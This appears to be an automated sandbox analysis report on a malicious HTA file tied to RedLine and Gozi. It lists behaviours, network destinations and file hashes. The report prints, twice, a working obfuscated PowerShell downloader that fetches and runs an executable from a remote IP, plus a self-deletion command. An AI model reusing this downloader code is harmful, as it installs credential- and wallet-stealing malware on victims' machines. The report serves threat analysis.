Analysis Overview
SHA256
e49c5359656eedbca5bffe8ab5aada0e0b3301c47e426b028f27d6e89027adad
Threat Level: Known bad
The file 55.hta was found to be: Known bad.
Malicious Activity Summary
RedLine
Gozi, Gozi IFSB
RedLine payload
Executes dropped EXE
Downloads MZ/PE file
Blocklisted process makes network request
Checks computer location settings
Loads dropped DLL
Reads user/profile data of web browsers
Checks installed software on the system
Accesses cryptocurrency files/wallets, possible credential harvesting
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
Suspicious use of WriteProcessMemory
Modifies Internet Explorer settings
Suspicious use of AdjustPrivilegeToken
MITRE ATT&CK
Enterprise Matrix V6
Analysis: static1
Detonation Overview
Reported
2022-08-05 01:33
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2022-08-05 01:33
Reported
2022-08-05 01:36
Platform
win7-20220715-en
Max time kernel
109s
Max time network
106s
Command Line
Signatures
Gozi, Gozi IFSB
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\bartor.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\WinZip.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
Reads user/profile data of web browsers
Accesses cryptocurrency files/wallets, possible credential harvesting
Checks installed software on the system
Enumerates physical storage devices
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3440072777-2118400376-1759599358-1000\Software\Microsoft\Internet Explorer\Main | C:\Windows\SysWOW64\mshta.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\bartor.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\55.hta"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function EnIuqI($tUJRTxlOGTzBBb, $sVHQTsPPna){[IO.File]::WriteAllBytes($tUJRTxlOGTzBBb, $sVHQTsPPna)};function wteXJMZiCxLIHWyVK($tUJRTxlOGTzBBb){if($tUJRTxlOGTzBBb.EndsWith((bDbIUiomifraxsd @(32622,32676,32684,32684))) -eq $True){rundll32.exe $tUJRTxlOGTzBBb }elseif($tUJRTxlOGTzBBb.EndsWith((bDbIUiomifraxsd @(32622,32688,32691,32625))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $tUJRTxlOGTzBBb}else{Start-Process $tUJRTxlOGTzBBb}};function jLwXZBeGxQAjckUU($EnIuqI){$OVWWVDSjZvvguN=(bDbIUiomifraxsd @(32648,32681,32676,32676,32677,32686));$XHGthyalbeewKOEQPWZ=(Get-ChildItem $EnIuqI -Force);$XHGthyalbeewKOEQPWZ.Attributes=$XHGthyalbeewKOEQPWZ.Attributes -bor ([IO.FileAttributes]$OVWWVDSjZvvguN).value__};function hjUZSOEutRzDQjOlSx($ioMMScKpkah){$iHEFhbXBYCwXIirUfY = New-Object (bDbIUiomifraxsd @(32654,32677,32692,32622,32663,32677,32674,32643,32684,32681,32677,32686,32692));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$sVHQTsPPna = $iHEFhbXBYCwXIirUfY.DownloadData($ioMMScKpkah);return $sVHQTsPPna};function bDbIUiomifraxsd($DUtYcPEQU){$RsPcedMKJvyiH=32576;$qkuvmRDebHfQ=$Null;foreach($hGnJeoBRHGIJa in $DUtYcPEQU){$qkuvmRDebHfQ+=[char]($hGnJeoBRHGIJa-$RsPcedMKJvyiH)};return $qkuvmRDebHfQ};function RtvXhZhq(){$veIehdmMqql = $env:AppData + '\';$qitNbz = $veIehdmMqql + 'bartor.exe'; if (Test-Path -Path $qitNbz){wteXJMZiCxLIHWyVK $qitNbz;}Else{ $iplTNEkBLCQEiP = hjUZSOEutRzDQjOlSx (bDbIUiomifraxsd @(32680,32692,32692,32688,32634,32623,32623,32625,32633,32627,32622,32629,32630,32622,32625,32628,32630,32622,32625,32627,32625,32623,32674,32673,32690,32692,32687,32690,32622,32677,32696,32677));EnIuqI $qitNbz $iplTNEkBLCQEiP;wteXJMZiCxLIHWyVK $qitNbz;};jLwXZBeGxQAjckUU $qitNbz;;;;;}RtvXhZhq;
C:\Users\Admin\AppData\Roaming\bartor.exe
"C:\Users\Admin\AppData\Roaming\bartor.exe"
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /C start C:\Users\%UserName%\Downloads\WinZip.exe
C:\Users\Admin\Downloads\WinZip.exe
C:\Users\Admin\Downloads\WinZip.exe
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 7 & Del "bartor.exe"
C:\Windows\SysWOW64\choice.exe
choice /C Y /N /D Y /T 7
Network
| Country | Destination | Domain | Proto |
| RU | 193.56.146.131:80 | 193.56.146.131 | tcp |
| RU | 193.56.146.131:80 | 193.56.146.131 | tcp |
| NL | 80.66.87.52:2500 | | tcp |
Files
\Users\Admin\AppData\Roaming\bartor.exe
| MD5 | 0f2be4fe0362766dcf339d4c03326bc4 |
| SHA1 | 69e26e9e75e8a8359d232d8e14318b9235e1a828 |
| SHA256 | 2f96d468f1c62104047e67e8dcd2a8590924e99f85f5c009f348f67bd83e2529 |
| SHA512 | 8d3d86dd98c04fea1a212be212b155dec3895fb88806c6bc460820635179ca3e9f60296cf448d3054fcccd38c311097395d108e6481aba5c60a6308d9b785150 |
\Users\Admin\Downloads\WinZip.exe
| MD5 | 468042278a3e4841d3e33ccca10d99ca |
| SHA1 | 22532f37096a200d448420359c01bbebaaf6b820 |
| SHA256 | b92e9e2c758e32857506f9472cc51aec4b499afa6f703f7c40218e4e4258da86 |
| SHA512 | 4c85e54b26ee0540fa9350f92a85f7e254f3c11481f3a3099c96ce47b83963ed4661216b2c4109e76e94ee3821310e3a35b2e37fc076a13f9f663dc6bc992ebf |
Analysis: behavioral2
Detonation Overview
Submitted
2022-08-05 01:33
Reported
2022-08-05 01:36
Platform
win10v2004-20220721-en
Max time kernel
147s
Max time network
152s
Command Line
Signatures
Gozi, Gozi IFSB
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\bartor.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\WinZip.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\bartor.exe | N/A |
Reads user/profile data of web browsers
Accesses cryptocurrency files/wallets, possible credential harvesting
Checks installed software on the system
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\bartor.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\55.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function EnIuqI($tUJRTxlOGTzBBb, $sVHQTsPPna){[IO.File]::WriteAllBytes($tUJRTxlOGTzBBb, $sVHQTsPPna)};function wteXJMZiCxLIHWyVK($tUJRTxlOGTzBBb){if($tUJRTxlOGTzBBb.EndsWith((bDbIUiomifraxsd @(32622,32676,32684,32684))) -eq $True){rundll32.exe $tUJRTxlOGTzBBb }elseif($tUJRTxlOGTzBBb.EndsWith((bDbIUiomifraxsd @(32622,32688,32691,32625))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $tUJRTxlOGTzBBb}else{Start-Process $tUJRTxlOGTzBBb}};function jLwXZBeGxQAjckUU($EnIuqI){$OVWWVDSjZvvguN=(bDbIUiomifraxsd @(32648,32681,32676,32676,32677,32686));$XHGthyalbeewKOEQPWZ=(Get-ChildItem $EnIuqI -Force);$XHGthyalbeewKOEQPWZ.Attributes=$XHGthyalbeewKOEQPWZ.Attributes -bor ([IO.FileAttributes]$OVWWVDSjZvvguN).value__};function hjUZSOEutRzDQjOlSx($ioMMScKpkah){$iHEFhbXBYCwXIirUfY = New-Object (bDbIUiomifraxsd @(32654,32677,32692,32622,32663,32677,32674,32643,32684,32681,32677,32686,32692));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$sVHQTsPPna = $iHEFhbXBYCwXIirUfY.DownloadData($ioMMScKpkah);return $sVHQTsPPna};function bDbIUiomifraxsd($DUtYcPEQU){$RsPcedMKJvyiH=32576;$qkuvmRDebHfQ=$Null;foreach($hGnJeoBRHGIJa in $DUtYcPEQU){$qkuvmRDebHfQ+=[char]($hGnJeoBRHGIJa-$RsPcedMKJvyiH)};return $qkuvmRDebHfQ};function RtvXhZhq(){$veIehdmMqql = $env:AppData + '\';$qitNbz = $veIehdmMqql + 'bartor.exe'; if (Test-Path -Path $qitNbz){wteXJMZiCxLIHWyVK $qitNbz;}Else{ $iplTNEkBLCQEiP = hjUZSOEutRzDQjOlSx (bDbIUiomifraxsd @(32680,32692,32692,32688,32634,32623,32623,32625,32633,32627,32622,32629,32630,32622,32625,32628,32630,32622,32625,32627,32625,32623,32674,32673,32690,32692,32687,32690,32622,32677,32696,32677));EnIuqI $qitNbz $iplTNEkBLCQEiP;wteXJMZiCxLIHWyVK $qitNbz;};jLwXZBeGxQAjckUU $qitNbz;;;;;}RtvXhZhq;
C:\Users\Admin\AppData\Roaming\bartor.exe
"C:\Users\Admin\AppData\Roaming\bartor.exe"
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /C start C:\Users\%UserName%\Downloads\WinZip.exe
C:\Users\Admin\Downloads\WinZip.exe
C:\Users\Admin\Downloads\WinZip.exe
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 7 & Del "bartor.exe"
C:\Windows\SysWOW64\choice.exe
choice /C Y /N /D Y /T 7
Network
| Country | Destination | Domain | Proto |
| RU | 193.56.146.131:80 | 193.56.146.131 | tcp |
| RU | 193.56.146.131:80 | 193.56.146.131 | tcp |
| IE | 20.50.73.9:443 | | tcp |
| NL | 67.26.105.254:80 | | tcp |
| US | 8.8.8.8:53 | trackingg-protectioon.cdn1.mozilla.net | udp |
| NL | 80.66.87.52:2500 | | tcp |
| NL | 67.26.105.254:80 | | tcp |
| NL | 194.76.225.168:80 | | tcp |
Files
C:\Users\Admin\AppData\Roaming\bartor.exe
| MD5 | 0f2be4fe0362766dcf339d4c03326bc4 |
| SHA1 | 69e26e9e75e8a8359d232d8e14318b9235e1a828 |
| SHA256 | 2f96d468f1c62104047e67e8dcd2a8590924e99f85f5c009f348f67bd83e2529 |
| SHA512 | 8d3d86dd98c04fea1a212be212b155dec3895fb88806c6bc460820635179ca3e9f60296cf448d3054fcccd38c311097395d108e6481aba5c60a6308d9b785150 |
C:\Users\Admin\Downloads\WinZip.exe
| MD5 | 468042278a3e4841d3e33ccca10d99ca |
| SHA1 | 22532f37096a200d448420359c01bbebaaf6b820 |
| SHA256 | b92e9e2c758e32857506f9472cc51aec4b499afa6f703f7c40218e4e4258da86 |
| SHA512 | 4c85e54b26ee0540fa9350f92a85f7e254f3c11481f3a3099c96ce47b83963ed4661216b2c4109e76e94ee3821310e3a35b2e37fc076a13f9f663dc6bc992ebf |